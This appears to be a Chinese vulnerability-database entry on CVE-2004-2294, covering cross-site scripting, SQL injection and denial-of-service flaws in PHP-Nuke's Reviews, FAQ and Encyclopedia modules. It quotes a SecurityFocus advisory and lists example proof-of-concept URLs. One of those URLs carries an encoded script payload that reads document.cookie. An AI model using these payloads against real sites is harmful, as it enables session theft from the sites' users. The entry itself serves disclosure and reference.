PHP-Nuke多个输入验证漏洞

PHP-Nuke多个输入验证漏洞

漏洞ID 1107990 漏洞类型 跨站脚本
发布时间 2004-06-11 更新时间 2005-10-20
图片[1]-PHP-Nuke多个输入验证漏洞-安全小百科CVE编号 CVE-2004-2294
图片[2]-PHP-Nuke多个输入验证漏洞-安全小百科CNNVD-ID CNNVD-200412-182
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24194
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-182
|漏洞详情
PHP-Nuke6.0到7.3版本的Reviews模块中的send_review函数存在Canonicalize-before-filter错误漏洞。远程攻击者可以借助text参数中的十六进制编码XXS序列,注入任意web脚本或HTML,该漏洞在规范化之前被检查为危险序列,导致跨站脚本(XSS)漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/10524/info
    
PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application:
    
PHP-Nuke is prone to multiple cross-site scripting vulnerabilities. These issues affect the 'Faq', 'Encyclopedia' and 'Reviews' modules.
    
These cross-site scripting issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If a user follows the malicious link, the attacker-supplied code executes in the Web browser of the victim computer.
    
PHP-Nuke is prone to an SQL Injection Vulnerability. Again the issue is due to a failure of the application to properly sanitize user-supplied input. The problem presents itself when SQL syntax is passed through the a parameter of the 'Reviews' module.
    
As a result of this issue an attacker could modify the logic and structure of database queries.
    
Finally a remote denial of service vulnerability is reported to exist in the score subsystem of the 'Review' module of PHP-Nuke, it is reported that a large number supplied as a value for a parameter passed to the 'Reviews' module will deny service to legitimate PHP-Nuke users. 

http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&url_title=foobar&url=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&cover=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&rlanguage=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&[email protected]&reviewer=f00bar&hits=[xss code here]
http://www.example.com/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&[email protected]&reviewer=[xss code here]
http://www.example.com/nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00@bar.org&text=f00%253c/textarea>%253cscript>alert%2528document.cookie);%253
c/script>bar
http://www.example.com/nuke73/modules.php?name=Reviews&rop=savecomment&uname=[xss code here]&id=8&score=9
|参考资料

来源:BID
名称:10524
链接:http://www.securityfocus.com/bid/10524
来源:BUGTRAQ
名称:20040611[waraxe-2004-SA#032-MultiplesecurityflawsinPhpNuke6.x-7.3]
链接:http://www.securityfocus.com/archive/1/365865
来源:OSVDB
名称:6999
链接:http://www.osvdb.org/6999
来源:SECUNIA
名称:11852
链接:http://secunia.com/advisories/11852

相关推荐: SLMail Remote ETRN Command Buffer Overflow Vulnerability

SLMail Remote ETRN Command Buffer Overflow Vulnerability 漏洞ID 1100364 漏洞类型 Boundary Condition Error 发布时间 2003-05-07 更新时间 2003-05-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享